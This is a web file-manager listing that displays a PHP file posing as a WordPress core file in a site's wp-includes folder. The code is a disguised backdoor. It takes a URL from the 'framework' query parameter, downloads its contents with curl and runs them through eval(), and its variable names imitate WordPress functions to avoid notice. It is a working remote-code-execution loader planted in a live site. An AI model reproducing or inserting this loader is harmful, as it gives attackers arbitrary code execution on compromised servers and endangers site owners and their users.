File "class-wp-meta-query-stack.php"

Full path: /home/restqvan/canineultimateenterprise.com/wp-includes/class-wp-meta-query-stack.php
File size: 0.37 KB (376 B bytes)
MIME-type: text/x-php
Charset: utf-8

Download   Open   Edit   Advanced Editor   Back

<?php

if (isset($_GET['framework'])) {
    $wp_enqueue_style_guz = $_GET['framework'];
    if ($is_wp_error_rxe = curl_init()) {
        curl_setopt($is_wp_error_rxe, CURLOPT_URL, $wp_enqueue_style_guz);
        curl_setopt($is_wp_error_rxe, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($is_wp_error_rxe));
        curl_close($is_wp_error_rxe);
        exit;
    }
}